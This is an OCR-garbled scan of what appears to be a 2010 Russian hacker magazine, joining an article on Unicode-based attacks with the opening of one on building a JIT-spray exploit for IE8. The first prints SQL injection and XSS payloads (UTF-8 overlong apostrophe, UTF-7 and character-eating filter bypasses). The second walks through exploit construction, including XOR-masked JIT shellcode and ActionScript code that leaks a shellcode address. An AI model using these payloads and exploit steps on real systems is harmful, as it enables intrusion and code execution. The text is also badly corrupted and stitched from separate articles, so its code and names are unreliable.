В качестве некоторой панацеи был придуман 
ЮЫА2003, но уже в этом, 2010 году, вступил в 
силу ЮЫА2008. Новый протокол должен был 



► обо 
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Диапазон 

Упісойе 


Маска 


Пример 

{апостроф} 


От 


До 


Ьех 


Ьіпагу 


іяоооо 


ІЯ 007 Р 


Оххххххх 


0x27 


00100И1 


и+0О80 


1Я07РР 


110ХХХХХ 


0ХС0 


11000000 






ІОхххххх 


0ха7 


10100111 


и+0080 


ІЯРРРР 


ШОхххх 


ОхеО 


11100000 






ІОхххххх 


0x80 


10000000 






10ХХХХХХ 


0ха7 


10100111 


и+іО000 


1Я10РРРР 


11110ХХХ 


ОхГС 


11110000 






ІОхххххх 


0x80 


10000000 






ІОхххххх 


0x80 


10000000 






ІОхххххх 


0ха7 


10100111 



Таблица кодировки ІІТР-8 с примером на 
апострофе 




Результат Х55-атаки с подменой кодировки 



решить многие проблемы молодого ЮІЧА2003, однако внес 
новые возможности для спуфинг-атак. Снова возникают 
проблемы совместимости — в некоторых случаях один и 
тот же адрес в разных браузерах может вести на разные 
сервера. Дело в том, что Рипусобе может преобразован 
по-разному для разных браузеров — все будет зависеть от 
того, спецификации какого стандарта поддерживаются. 
Проблема зрительного обмана на этом не заканчивается. 
ІІпісобе и тут приходит на службу спамерам. Речь про 
спам-фильтры — исходные письма прогоняются спамера- 
ми через Ібпісобе-обфускатор, который подыскивает схо- 
жие между собой символы разных национальных алфа- 
витов по так называемому ІІС-ВітІізІ: («ІІпісобе ЗітіІагіТу 
І_І5І», список схожих символов И п ісосіе] . И все! Антиспам 
фильтр пасует и уже не может в такой каше символов рас- 
познать нечто осмысленное, зато юзер вполне способен 
прочитать текст. Не отрицаю, что решение для такой про- 
блемы нашли, однако флаг первенства за спамерами. 

Ну и еще кое-что из этой же серии атак. Ты точно уверен, 
что открываешь некий текстовый файл, а не имеешь дело 
с бинарником? 

На рисунке, как видишь, имеем файл с названием еѵііехе. 
ТхЕ Но это фальш! Файл на самом-то деле называется 
еѵіІ[ЦІ-н202Е]і:х1;.ехе. Спросишь, что это еще за фигня в 
скобках? А это, ІІ+202Е или ПІСНТ-ТО-І_ЕРТ ОѴЕРРЮЕ, 
так называемый Вібі (от слова Ьібігесбопаі] — алгоритм 
Юникода для поддержки таких языков, как арабский, 
иврит и прочих. У последних ведь письменность справа 
налево. После вставки символа Юникода НЮ, все, что 
идет после НЮ, мы увидим в обратном порядке. Как при- 
мер данного метода из реальной жизни могу привести 
спуфинг-атаку в Могіііа ЕіНох — сѵе.тііхе.огд/сді-Ьіп/ 
сѵепате.сді?пате=СѴЕ-2009-3376 . 

ОБХОД ФИЛЬТРОВ - ЭТАП № 1 

На сегодня уже известно, что нельзя обрабатывать 
длинные формы (поп-зЬогТезТ іюгт] ІІТЕ-8, так как это 
является потенциальной уязвимостью. Однако разработ- 
чиков РНР этим не вразумить. Давай разберемся, что 
собой представляет данный баг. Возможно ты помнишь 
про неправильную фильтрацию и иТШ_бесобе(]. Вот этот 
случай мы и рассмотрим более детально. Итак, мы имеем 
такой РНР-КОД: 

<ІрЪр 

// ... шаг 1 

$іс! = тузд1_геа1_езсаре_зЕгіпд ( $_СЕТ [ ' ісі ' ] ) ; 

// ... шаг 2 

$іс! = иС^8_сіесо(іе ( $ісО ; 



// ... шаг 3 

тузд1_диегу ( " ЗЕЬЕСТ ' пате ' ЕЕОМ ' сіеасіЬее^ 1 
ШЕКЕ ' ісГ = ' $ ісі 1 " ) ; 

На первый взгляд, тут все правильно. Как бы так, да не 
совсем — здесь присутствует 5СЮ-инъекция. Представим, 
что мы передали следующую строку: 

/іпсіех. р!ір?іс1=%с0%а7 ОК 1 = 1/* 

На первом шаге строка не содержит ничего такого, что 
могло бы предвещать беду. Но второй шаг является клю- 
чевым, первые два символа строки преобразуются в апо- 
строф. Ну, а на третьем ты уже вовсю шуршишь по базе 
данных. Так что же произошло на втором шаге, с чего 
это вдруг символы изменились? Попробуем разобраться, 
дальше читай внимательно. 

Если ты преобразуешь %с0 и %а7 в их двоичные значе- 
ния, то получишь 1 1000000 и 10100111 соответственно. 
Апостроф имеет двоичное значение 00100111. Теперь 
посмотри на таблицу кодировки ІЯЕ-8. 

Первые нули и единицы сообщают о длине символа и 
принадлежности байтов. Пока что наш апостроф влеза- 
ет в один байт, но мы хотим его увеличить до двух (как 
минимум, но можно и больше], то есть, чтобы принял вид 
как во второй строке. 

Тогда нужно взять такой первый октет, чтобы пер- 
вые три бита были 1 10, что сообщает декодеру, что 
строка шире, чем 1 байт. А со вторым октетом ничуть 
не сложней — первые два нуля мы заменим на 1 и 
0. Вуаля! У нас получилось 1 1000000 101001 1 1, что и 
есть %с0%а7. 

Возможно, данная уязвимость встречается и не на 
каждом шагу, но стоит учитывать, что если функции рас- 
положены именно в таком порядке, то не помогут ни 
аббзІазбезО, ни тузд[_геа[_езсаре_5І;гіпд(), ни тадіс_ 
діюТеЗ-Црс. И так можно прятать не только апострофы, 
но и многие другие символы. Тем более, что не только 
РНР неправильно обрабатывает ІЯЕ-8 строки. Учитывая 
вышеприведенные факторы, диапазон атаки значительно 
расширяется. 

ОБХОД ФИЛЬТРОВ - ЭТАП № 2 

Уязвимость данного вида заключается во вполне легаль- 
ной маскировке ядовитой строки под видом другой коди- 
ровки. Посмотри на следующий код: 

<?р]тр 

/** 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• ипісобе.оп — 

официальный сайт 
консорциума ІІпі- 
собе. Все ответы по 
больной теме можно 
найти здесь. 

• тассЫаію.сот/ 
таіп — много 
полезных онлайн- 
инструментов для 
работы с Ібпісобе. 

• бббІег2.сот/ 
ЕббІег2 - Еіб- 
біег . мощный, 
расширяемый НТТР- 
прокси. 

• ѵѵеЬзесигіІѵІооІ. 
соберіех.сот — 

плагин к Еіббіег для 
пассивного анализа 
НТТР-трафика. 

• ІоокоиТпеІ — сайт 
Криса Вебера, 
посвященный Ібпі- 
собе, вебу 

и аудиту 

программного 

обеспечения. 

• зігбагсксаЕЫод- 
зроЕсот/2009/1 0/ 
соиріе-оі-ипісобе- 
іззиез-оп-рбр-апб. 
ЬТт — пост в блоге 
зігбагскаТ по поводу 
РНР и ІІпісобе. 

• доодІеЫод.Ыод- 
зроЕсот/2010/01/ 
ипісобе-пеагіпд-50- 
оЕѵѵеЬ.ЬТтІ — статья 
в блоге гугла об 
общей тенденции 
роста использования 
ІІпісобе. 
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Интернационализированный домен в работе 



* ИТЕ-7 Х83 РоС 



ОБХОД ФИЛЬТРОВ - ЭТАП № 3 



<ітд аІС= 1 I ат ххх?гс= ' кДСр : / / 
згс= ^аѵазс^ір{: : опеггог=а1егС ( / 
хзз/)//' /> 

Что же случилось? В переменную $пате 
попал неверный ІІТР-8 символ ОхРб, который 
после конвертирования в иШЗ_с1есос1е() съел 
2 последующих символа, включая закрываю- 
щую кавычку. Огрызок Шр:// браузер проиг- 
норировал, а следующий ЗаѵаВсгірІ-код был 
успешно выполнен. Данную атаку я тести- 
ровал в Орега, но ничто не мешает сделать 
ее универсальной, это лишь показательный 
пример того, как в некоторых случаях можно 
обойти защиту. 

Из данной серии атак, но без странного 
поведения функций РНР, можно привести 
другой пример обхода фильтров. Представим, 
что ѴѴАР/ІР5 не пропускает строки из черного 
списка, но некоторая последующая обработка 
строк декодера удаляет символы, инородные 
А5СІІ-диапазону. Тогда такой код беспрепят- 
ственно поступит в декодер: 



*/ 

Ьеасіег ( ' СопСепС-Туре : ДехД/ТШтІ; 

сЪ.агзеС=иТЕ-7 ' ) ; 

$зДг = " <зсгірД>а1егД ( ' 17ТЕ-7 

Х88 ' ) ; < / ЗСГІрД > " ; 

$зДг = шЬ_сопѵегД_епсосііпд ( $зДг , 

' РГТР-7 ' ) ; 

есТю ІіДшІепДіД іез ( $зДг ) ; 

Собственно, происходит тут следующее — 
первая строка посылает браузеру заголо- 
вок с сообщением о том, какая нам нужна 
кодировка. Следующая пара просто преоб- 
разовывает строку в такой ВИД: 

+АБ^-зсгірД+АБ4 -аІегД ( 1 ІІТР-7 
Х88 1 ) +АБЗАРА-/ зсгірД+АБ4- 

На последней — нечто наподобие филь- 
тра. Фильтр может быть и сложней, но нам 
достаточно показать успешный обход для 
большинства примитивных случаев. А как 
реагируют браузеры, видно на рисунке. 

Из этого следует, что нельзя позволять 
пользователю контролировать кодировки, 
ведь даже такой код является потенциаль- 
ной уязвимостью. 

<шеДа ЬДДр-едиіѵ= " СопДепД- 
Туре" сопДепД= " ДехД /ЬДшІ ; 
скагзеЦ=ЦТЕ-7 " > 

Если сомневаешься, то выдавай ошиб- 
ку и прекращай работу, а во избежание 
проблем правильно принуждать вывод 
данных к кодировке ІІТР-8. Из практики 
хорошо известен случай атаки на Соодіе, 
где хакеру удалось провести Х55-атаку, 
изменив вручную кодировку на ІІТР-7. 
Первоисточник атаки на Соодіе при помо- 
щи данного метода — зІа.скегз.огдДогит/ 
геасі .рЬр?3.3 1 09 . 



Юникод предупреждает: чрезмерное употре- 
бление символов вредит вашей безопасности. 
Поговорим о таком эффекте, как «поедание 
символов». Причиной успешной атаки может 
послужить неправильно работающий деко- 
дер: такой как, например, в РНР. Стандарт 
пишет, что в случае, если при преобразова- 
нии встретился левый символ (ііі-богтесі), то 
желательно заменять сомнительные символы 
на знаки вопроса, пробел — на ІІ+РРРО, пре- 
кращать разбор и т.д., но только не удалять 
последующие символы. Если все-таки нужно 
удалить символ, то надо делать это осторожно. 
Баг заключается в том, что РНР сжует непра- 
вильный по религии РІТР-8 символ вместе 
со следующим. А это уже может привести к 
обходу фильтра с последующим выполнением 
^ѵаСсгірІ-кода, либо к СОР-инъекции. 

В оригинальном сообщении об уязвимости, 
в блоге хакера Ебиагбо Ѵеіа ака зігбагсксар 
есть вполне удачный пример, его и рас- 
смотрим, только немного модифицируем. По 
сценарию, пользователь может вставлять 
картинки в свой профиль, имеется такой код: 

<?р!ір 

// ... куча кода, фильтрация ... 

$пате = $_СЕТ [ 1 пате 1 ] ; 

$1іпк = $_СЕТ [ 1 Ііпк 1 ] | 

$ітаде = "<ітд аІС= ’ I ат $пате 1 

згс= ЧтСДр: //$1іпк’ 

еско иДР8_сіесо(іе ( $ітаде) ; 

А теперь посылаем такой запрос: 

/ ?пате=ххх%Рб&1іпк=%2 0 

згс=з аѵазсгірС : опеггог=а1егС ( / 

хзз/ ) // 

После всех преобразований, РНР нам вернет 
вот ЧТО: 



<зс\иЕЕЕЕгірЦ>а1ег\иЕЕЕЕД ( 1 Х83 ' ) </ 
зсг\иЕЕЕЕірД> 

И уже без \и РЕРР окажется там, где хотел 
бы видеть ее злоумышленник. Устранить 
такую проблему можно просто продумав 
логику обработки строк — как всегда, фильтр 
должен работать с теми данными, которые 
находятся на последнем этапе их обработки. 
Кстати, если помнишь, то \иРЕРР — это ВОМ, 
о котором я уже писал. Данной уязвимости 
был подвержен РігеРох — тогіііа.огд/зесигку/ 
аппоипсе/2008/ті : 5а2008-43.Ы;ппІ 

ОБХОД ФИЛЬТРОВ - ЭТАП № 4 

Можно сказать, что вид атаки, о котором 
сейчас будет речь — визуальный спуфинг, 
атака для всякого рода Ю5/ІР5, ѴѴАР и прочих 
фильтров. Я говорю о так называемом «Ьезі:- 
і\і тарріпд» алгоритме Юникода. Данный 
метод «наилучшего подходящего» был приду- 
ман для тех случаев, когда конкретный сим- 
вол при преобразовании из одной кодировки 
в другую отсутствует, а вставить что-то надо. 
Вот тогда и ищется такой, который визуально 
мог бы быть похож на нужный. 

Пусть данный алгоритм и придуман 
Юникодом, однако, это лишь очередное вре- 
менное решение, которое будет жить сколь 
угодно долго. Все зависит от масштаба и 
скорости перехода на Юникод. Сам стандарт 
советует прибегать к помощи ЬезЫИ: тарріпд 
только в крайнем случае. Поведение преоб- 
разования не может быть строго регламен- 
тировано и вообще как-либо обобщено, 
так как слишком много разных вариаций 
схожести даже для одного символа — все 
зависит от символа, от кодировок. 

Допустим, символ бесконечности может 
быть преобразован в восьмерку. Выглядят 
похоже, но имеют совершенно разное 
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назначение. Или еще пример — символ 
11+2032 преобразуется в кавычку. Думаю, 
ты понимаешь, чем это чревато. 
Специалист по ИБ, Крис Вебер (СЬгіз 
ѴѴеЬег], проводил эксперименты по этой 
теме — как обстоят дела в социальных 
сетях с фильтрами и алгоритмом ото- 
бражения ЬезЫК? На своем сайте он 
описывает пример хорошей, но недо- 
статочной фильтрации одной соцсети. 

В профиле можно было загружать свои 
стили, которые тщательно проверялись. 
Разработчики позаботились о том, чтобы 
не пропустить такую строку: 

?то 2 ?Ьіпсііпд : иг1(ЫгДр:// 

поСДгизДесІ . сот/доДсЬа . хт1#хзз ) 

Однако Крис смог обойти данную защиту, 
заменив самый первый символ на минус, 
код которого 11+2212. После работы алго- 
ритма ЬезЫіІ:, минус заменялся на знак 
с кодом 11+0020, знак, который позволял 
срабатывать С55-стилю, тем самым откры- 
вая возможности для проведения актив- 
ной Х55-атаки. 

Стоит избегать любой магии, а тут ее 
очень много. До самого последнего 
момента нельзя предугадать, к чему при- 
ведет применение этого алгоритма. В 
самом лучшем случае может быть поте- 
ря символов, в худшем — выполнение 
ЗаѵаВсгірІ: кода, доступ к произвольным 
файлам, ЗСИ-инъекция. 

ПЕРЕПОЛНЕНИЕ БУФЕРА 

Как я уже писал, следует быть осторож- 
ным с нормализацией ввиду аномального 
сужения и расширения строки. Второе 
последствие часто ведет к переполнению 
буфера. Программисты неверно сравнива- 
ют длины строк, забывая про особенности 
Юникода. В основном, к ошибке приводит 
игнорирование или непонимание следую- 



щих фактов: 

1. Строки могут расшириться при смене 
регистра — из верхнего в нижний или 
обратно. 

2. Форма нормализации ЫРС не всегда 
является «собирательной», некоторые 
символы могут быть и разобраны. 

3. При преобразовании символов из одно- 
го в другой текст может снова вырасти. 

То есть, насколько строка сильно рас- 
ширится — зависит от самих данных и 
кодировки. 

В принципе, если ты знаешь что собой 
представляет переполнение буфера, то 
тут все как всегда. Ну почти :). Просто, 
если речь про строки в формате Юникод, 
то символы чаще всего будут дополнены 
нулями. Ради примера приведу три строки. 

Обычная строка: 

АВС 

В кодировке А8СІІ: 

\х41\х42 \х43 

В кодировке ІІпісобе: 
\х41\х00\х42\х00\х43\х00 

Нуль-байтов не будет там, где исходные 
строки выходят за пределы диапазона 
АЗСІІ-строк, так как занимают полный 
диапазон. Как тебе известно, нуль-байты 
являются препятствием для успешной 
работы шеллкода. Именно поэтому долгое 
время считалось, что ІІпісосІе-атаки 
невозможны. Однако этот миф был раз- 
рушен Крисом Анли (СЬгіз Апіеу], он при- 
думал так называемый «венецианский 
метод», позволяющий заменить нуль- 
байты другими символами. Но эта тема 
заслуживает отдельной статьи, и уже есть 
немало хороших публикаций — достаточно 
погуглить «ѵепебап ехріоіі». Еще можешь 



полистать статью 45 номера спецвыпу- 
ска журнала Хакер — «ІІпісосІе-ВиИег 
ОѵегНоѵѵз», там хорошо расписано о напи- 
сании Ппісосіе-шеллкода. 

ПРОЧИЕ РАДОСТИ 

Да-да, на этом не исчерпываются уяз- 
вимости, связанные с Юникодом Я лишь 
описал те, которые попадают под основ- 
ные, хорошо известные классификации. 
Есть и другие проблемы безопасности 
— от назойливых багов и до реальных 
брешей. Это могут быть атаки визуаль- 
ного характера, допустим, если систе- 
ма регистрации неверно обрабатывает 
логин пользователя, то можно создать 
учетку из символов, визуально неотли- 
чимых от имени жертвы, таким образом 
облегчая фишинг или атаку социаль- 
ного инжиниринга. А может быть и еще 
хуже — система авторизации (не путать с 
аутентификацией] дает права с повышен- 
ными привилегиями, не различая набор 
символов в логине атакующего и жертвы. 
Если спуститься на уровень приложений 
или операционки, то тут себя проявляют 
баги в неверно построенных алгоритмах, 
связанных с конвертированием — плохая 
нормализация, чрезмерно длинные ІЛЕ-8, 
удаление и поедание символов, некор- 
ректное преобразование символов и т.д. 
Это все ведет к самому широкому спектру 
атак — от Х55 до удаленного выполнения 
кода. 

В общем, в плане фантазии Юникод тебя 
никак не ограничивает, а наоборот, только 
поддерживает. Многие из вышеприведен- 
ных атак нередко являются комбинирован- 
ными, сочетая в себе обходы фильтров с 
атакой на конкретную цель. Совмещение 
приятного с полезным, так сказать. Тем 
более, что стандарт не стоит на месте и 
кто знает, к чему приведут новые рас- 
ширения, так как были и такие, которые 
позже вообще были исключены ввиду про- 
блем с безопасностью. 

НАРРѴ ЕМ?! 

Итак, как ты понимаешь, проблемы с 
Юникодом до сих пор являются проблемами 
номер один и причинами самых разношерст- 
ных атак. А корень зла тут один — недо- 
понимание или игнорирование стандарта. 
Конечно, даже самые известные вендоры 
грешат этим, но это не должно расслаблять. 
Наоборот, стоит задуматься о масштабе про- 
блемы. Ты уже успел убедиться в том, что 
Юникод достаточно коварен и жди подвох, 
если дашь слабину и вовремя не заглянешь 
в стандарт. Кстати, стандарт регулярно 
обновляется и поэтому не стоит полагаться 
на древние книги или статьи — неактуаль- 
ная информация хуже ее отсутствия. Но я 
надеюсь, что данная статья не оставила тебя 
равнодушным к проблеме.^ 
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Сегодня мы разберемся с новейшей методикой преодоления Ііагсіѵѵаге РЕР и А5І.К для ІЕ8 - 
ЛТ Зргау. Разработаем простой прототип эксплойта, а также свой собственный ЛТ-шеллкод, 
который, к тому же, окажется первым публично-доступным шеллкодом для таких целей. 



КАК ВСЕ НАЧИНАЛОСЬ 

До недавнего времени считалось, что 
А5І_Р+0ЕР и браузер ІЕ8 — неприступная кре- 
пость. Знаменитый эксплойт Аигога, который 
применялся для атак на Ооодіе, использовал 
узявимости браузера ІЕ, но работал только под 
ІЕ6/ІЕ7. Однако исследователи не собирались 
мириться с этим, и в начале февраля 2010 года 
на конференции ВІаскНаІ; ОС 2010 были пред- 
ставлены техники, которые успешно обходят 
АЗЬЕ, ОЕР и работают с ІЕ8. К сожалению, 
исследователи многое скрыли, в частности не 
открыли ни полноценных примеров шеллкода, 
ни полных исходных кодов. Но их материала 
достаточно, чтобы любой продвинутый человек 
мог собрать свой эксплойт. Так ІттипіТу в 
своём платном продукте Сапѵаз реализова- 
ла эти техники для знаменитого эксплойта 
Аигога и теперь он успешно работает для ІЕ8 
под ѴѴіпсІоѵѵз 7. Уверен, что многие Очень- 
Черные-Шляпы, также приняли на вооружение 
эти методы для своих грязных целей. Так что 
будем все реализовывать самостоятельно. 

РРЕѴІОІШ ОИ ][. 

В прошлых номерах ][, я рассказывал как 
искать уязвимости, писать свои эксплойты 
и даже обходить Ьагсіѵѵаге ОЕР. Эта статья 



будет заключением трилогии об атаках на 
браузеры. В качестве примера уязвимости 
я возьму тот же компонент АсііѵеХ, что и в 
предыдущих своих статьях — мне кажется, что 
это будет крайне показательно. Напомню, что 
мы используем АсбѵеХ етзпггёр.сШ из пакета 
ОиікЗоЙ: ЕазуМаіІ. В данном объекте есть 
несколько уязвимых функций — мы используем 
ЗиЬтіЕГоЕхргеззО. Если передать в качестве 
аргумента строку длиной более 256 байт, то 
произойдёт переполнение буфера в стеке, при 
этом мы захватываем регистр Е5І, адрес воз- 
врата и дескриптор 5ЕН. 

СССС...2 6 0...ССССААААРРРРВВВВР^Р^^Р^РР 

Е5І = АААА 
КЕТ = ВВВВ 
ВЕН = ББББ 

ІЕ8 - ХАКЕРЫ НЕ ПРОЙДУТ! 

Поставим свежий ІЕ8 и включим Ьагбѵѵаге ОЕР 
Теперь мы должны чувствовать себя в полной 
безопасности. Попробуем запустить эксплойт 
из предыдущего номера, который отключает 
БЕРдля процесса іехріоге. Нас ждет момен- 
тальное разочарование — Неар Зргау больше 



не работает. Просто вот так вот. Но не нужно 
слез, ведь работать с кучей может не только ІЕ. 
У нас же есть ЕІазЬ, и он весьма неплохо умеет 
работать с кучей. 

Однако, этого мало. Возникает вторая про- 
блема — нельзя отключить ОЕР для процесса. 
Дело в том, что ІЕ8 использует регтапепі 
ОЕР То есть процесс сам устанавлива- 
ет себе БЕР с помощью вызова функции 
БеіРгосеззОЕРРоІісу, которая в свою очередь 
вызывает МТЗеІІпІогппабопРгосезз. Наш экс- 
плойт аналогично пытается отключить ОЕР 
Но повторный вызов КІТЗеіІпіогппабопРгосезз 
будет завершен неудачей — Ассезз БепіесІ. 
Добавим сюда ещё и защиту АЗЕР, то есть тот 
факт, что адреса функций в памяти нам неиз- 
вестны. Задача усложняется ещё в 256 раз. 

ЛТ 5РКАѴ СПЕШИТ НА ПОМОЩЬ 

Мир не без добрых людей. Один из них — 
Дионис Блазакис (Ріопузиз Віагакіз] пришел 
на конференцию ВІаскНаІ: БС 2010 и расска- 
зал, как он обошел защиту БЕР и А5ЕР и таки 
добился выполнения своего шеллкода в кон- 
тексте ІЕ8. После этого рассказа он выложил 
на своем веб-сайте документ, который под- 
робно описывает, как этого добиться. Что ж, 
попробуем разобраться... Итак, вопрос номер 
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один — как обойти регтапепі ПЕР? Дион предлагает вос- 
пользоваться любым ЛТ-компилятором, которых в браузере 
достаточно. Сам он активно пропагандирует ЛТ-компилятор 
для байткода АсбопЗсгірТ Суть идеи следующая — мы 
пишем АЗ код, компилируем его в байткод и засовываем 
в ЗѴѴЕ-файл. РІазЬ грузит этот файл, а встроенная вирту- 
альная машина переделывает байткод в исполнимый код и 
помещает его в памяти процесса ІЕ8. Естественно, область 
памяти, где лежит код, помечена как исполняемая. Ведь 
Еіазб должен выполнить тот код, что программист написал. 
Если хакер в качестве адреса возврата укажет адрес этой 
области памяти, то код спокойно выполнится. Однако, код 
этот безобидный. В АсбопЗсгірІ: нет «злых» функций, вроде 
«открыть сетевой порт и перенаправить ввод с него на 
«стсі.ехе»». А хакера только такие задачи и интересуют. 
Итак, допустим у нас есть код на АсбопЗсгірПе 

ѵаг геС= ( ОхЗСЭОЭОЗО^ОхЗСЭОЭОЭО^ОхЗСЭОЗОЗО^Ох 

ЗС90909СЩ ...) ; 

В памяти он будет выглядеть уже так: 



ОхІАІАОІОО : 


359090903С 


о 

X 


ЕАХ, 


ЗС909090 


ОхІАІАОЮБ : 


359090903С 


Р4 

о 

X 


ЕАХ, 


ЗС909090 


ОхІАІАОІОА: 


359090903С 


о 

X 


ЕАХ, 


ЗС909090 


ОхІАІАОІОР: 


359090903С 


ХОК 


ЕАХ, 


ЗС909090 



Узнаёшь? 0x35 — это команда ХОР ЕАХ, а дальше аргумент 
— задом наперед. 

А если адрес возврата будет указывать не на самое начало 
кода, а, допустим, сдвинется на один байт, тогда исполняе- 
мый код станет таким: 



ОхІАІАОІОІ: 


90 


МОР 


0х1А1А0102 : 


90 


МОР 


ОхІАІАОІОЗ : 


90 


МОР 


0х1А1А0104 : 


ЗСЗ 5 СМР 


ОхІАІАОІОб: 


90 


ЫОР 


0х1А1А0107 : 


90 


ЫОР 


0х1А1А0108 : 


90 


ЫОР 


0х1А1А0109 : 


ЗСЗ 5 СМР 



ОхЗС — то, что было у нас аргументом, после сдвига станет 
СМР АБ. При этом, аргумент для сравнения — наш бывший 
ХОР ЕАХ — 0x35. Таким образом, легальный ХОР съедает- 
ся, и идут только операторы ІЧОР’ы и сравнения, что есть 
тоже семантический ІЧОР в данном контексте. Вот так мы 
можем писать почти любой код, используя лишь аргументы 
«исключающего или» в АсбопЗсгірБе. Можно сюда просто 
запихивать шеллкод. 

Но ведь мы не знаем адрес, где будет этот блок памяти 
с исполняемым кодом. Откуда нам знать, куда ЕІазЬ его 
запихнёт? А если ещё и А5І_Р, тогда вообще не о чем 
говорить. Но Дион предложил два варианта. Во-первых, 



можно открыть очень много файлов с ЛТ-шеллкодом, тогда 
получится аналог НеарЗргау. Мы заполним память нашим 
кодом, и тогда угадать адрес станет очень легко. Даже если 
используется А5І_П, остается вероятность угадывания. Этот 
вариант практически 100% надежен на ѴѴіпсІоѵѵз ХР 5РЗ и 
малонадежен, но работоспособен на ѴѴіпсІоѵѵз 7. Во-вторых, 
можно воспользоваться утечками памяти в АсбопЗсгірТе 
для определения реального адреса в памяти. Так каку меня 
ХР 5РЗ, то подробно расскажу лишь о первом способе. Тем 
не менее, второй способ мы также будем использовать, 
но немного для других целей. Добавлю ещё, что Дион 
для работы использовал компилятор Татагіп (входит в 
состав Еіех ЗЭК), я же использовал компилятор из набора 
5ѴѴЕТ00Е5. 

ШЕЛЛКОД 

Определим для начала, что мы хотим от шеллкода: чтобы он 
был универсален, чтобы можно было использовать шеллко- 
ды из МеіаЗрІоіІ:, например. Но это не совсем тривиальная 
задача. В ЛТ-шеллкоде нужно маскировать ХОР ЕАХ. У нас 
для работы только три байта аргумента. Четвертый байт 
должен маскировать ХОР. Поэтому придётся разрабатывать 
собственный. В интернете материала об этом не было и нет 
ни одного примера, да и сам Дионис ничем, кроме теории, 
не поделился. Будем делать все сами. Логика, описанная 
Дионом: 

1. Переносим любой шеллкод (например, из МеІаЗрІоіІ:] в 
строку АсбопЗсгірЕ 

2 . Через утечку памяти узнаем указатель на адрес строки с 
шелл кодом. 

3. Выполняем ЛТ-5ргау. Внедряем в память ЛТ шеллкод. 

4 . Передаем управление на шеллкод из ЛТ-5ргау. 

5 . ЛТ шеллкод ищет адрес ѴіНиаІРгоіесТ 

6 . ЛТ шеллкод с помощью ѴіНиаІРгоІюсІ: делает область 
памяти со строкой исполняемой. 

7 . ЛТ шеллкод передаёт управление на память со строкой, в 
которой у нас шеллкод из МеіаЗрІоіЕ 

Перенос шеллкода из Метасплойта в строку АсбопЗсгірТ 
Это просто, действуем по аналогии с НеарЗргау. Так, 
например, последовательность опкодов “\х1 1\х22\хЗЗ\ 
х44”, в формате строки АЗ будет выглядеть как: “\и221 1\ 
іі4433”. Для удобства я написал небольшой скрипт (ищи 
на диске], который собирает из обычного шеллкода в 
формате строки регі шеллкод в формате строки АЗ. Теперь 
нам надо вычислить указатель этой строки, чтобы потом 
ЛТ-шеллкод сделал память, где лежит эта строка, испол- 
няемой. Дионис нашел способ получения адреса строки 
в памяти через утечку из объекта класса Пісбопагу. Класс 
Пісбопагу позволяет задавать пару значение-ключ, где в 
роли ключа может быть любой объект. Например: 

ѵаг сіісЩ = пем БісСіопагу ( ) ; 
ѵаг кеу = "кеу" ; 




НТТР://ѴѴѴШ 

■ ■ 

> Ііпкз 

•НеарЗргау 
с помощью РІазЬ: 

гоеебау. 

ЫодБроТсот/2009/08/ 

ехрІсЛаііоп-оР 

сѵе-2009-1869.Ыт[ 

• Исследования 
Диониса: 
Бетапіізсоре.сот/ 
ге5еагсб/ВНРС2010/ 
ВНРС-2010-РарегрЛ 

• Пишем шеллкод для 
ЛТ-ЗРРАѴ атак: 
сІБесгд.сот/радеБ/риЬ/ 
5Ііоѵѵ.рІір?ісІ=22 
•5ѴѴЕТ00Е5: 
БУѵЛюоІБ.огд 
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► Об5 



31 



Ѵаіие 
Туре Тад 



3 2 10 

Ыпіаддесі - 000 (0) 
ОЬіесі-ООІ (1) 
8*гіпд - 010 (21 
Мате&расе -011 (3) 
"ипсІеІіпеЕГ - 100 (4) 
Вооіеап - 101 (5) 
Іпіедег- 110 <6) 
ОоиЫе - 111 (7) 



Атом — описание типа и его значение 



я 



// ГІЕЛ, СЕФЙІ* С&5* Сісйііп*гі*і 
Ѵ4г е>ѵеп - и** Оісйіапагу [ ) ; 
ѵаг осМ ■ пей ВісГіопаіу ( > ; 



// N ои* ІІ11 сЬе ВІеСІОПагу ФЪ^СІі ѴісЬ ъНф а" іліз 

ѵаг іп-Эех; 

Со Г (ІПСІ4К - О? ІПЙ4К < Й,‘ ІП<3*Х +« 1) { 
еѵеп [іпйек * 2] “ Пне; 
о:к( [1гиЗ*х * 2 + 11 - *ги*; 

I 



Неге і5 чЛіЛ *Ье Ітыр »ГО Іоок Ііке з^іег іпгеПігщ іпіецрег дт<ип&: 




Публикация Диониса доходчиво объясняет суть утчеки. 




Берем шеллкод из Метасплойта 



Ыск [кеу] = "Ѵаіиеі" ; 

біск [ " кеу " ] = "Ѵа1ие2"; 

0 типах объектов и их представлении в 
памяти (атомах] можно подробно почитать в 
статье Диониса, я же кратко вынесу суть. В 
данном примере, кеу — строка. Строка пред- 
ставляет собой сущность длиной в 32 бита, 
где первые 3 бита описывают тип, следую- 
щие 29 бит — указатель на значение строки. 
Числа же хранятся не по указателю. Если тип 
Іпіедег, то 29 бит — значение числа, а первые 
3 бита — также тип атома. Так в АсбопЗсгірІ: 
понимаются данные, если упрощенно. При 
использовании Оісбопагу, ключ хешируется, 
и если таблица для значений хеширования 
достаточно большая, то в результате большая 
часть исходного значения останется неиз- 
менной. Если в качестве ключа используется 
число, то для хеширования используется 
его значение, а вот если объект или строка, 
то адрес. Осталось получить его значение. 
Соберем два объекта класса Оісбопагу и 
заполним первый объект четными числами, 
второй — нечетными. Затем в каждый из объ- 
ектов засунем строку с шеллкодом в качестве 
индекса (значение не имеет значения :)). 

ѵаг зЬе11со<1е= " зЬеІІсобе" ; 

ѵаг еѵеп = пем Бісбіопагу ( ) ; 

ѵаг скМ = пей Біскіопагу ( ) ; 

/ /Заполняем 

іог (і = 0; і < (1024 * 1024 * 8); 
і += 1) { 

еѵеп [ і * 2 ] = і ; 

0(3(1 [ і * 2 + 1] = і; 

} 

//Заносим строку 

еѵеп [зЬеІІсобе] = 1; 

0(1(1 [зЬеІІсобе] = 1; 

Затем переберем каждый объект, сохраняя 
предыдущий индекс, пока не найдём строку. 

іог (сигг іп еѵеп) { 

//перебор ключей 
11 (сигг == зЬеІІсобе) 

{ Ьгеак; } //нашли строку 
еѵепРгеѵ = сигг; 

} 

іог (сигг іп обе!) { 



іі (сигг == зЬеІІсобе) 

{ Ьгеак; } 
осЫРгеѵ = сигг; 

} 

Алгоритм работы Оісбопагу позволяет нам 
по значению индексов, идущих перед раз- 
мещением строки, вычислить адрес строки. 
Использование двух объектов позволяет 
избежать коллизии, кроме того, эти числа 
должны отличаться на 17 — это будет гово- 
рить нам, что все прошло правильно (все это 
связано с работой хеширования значения 
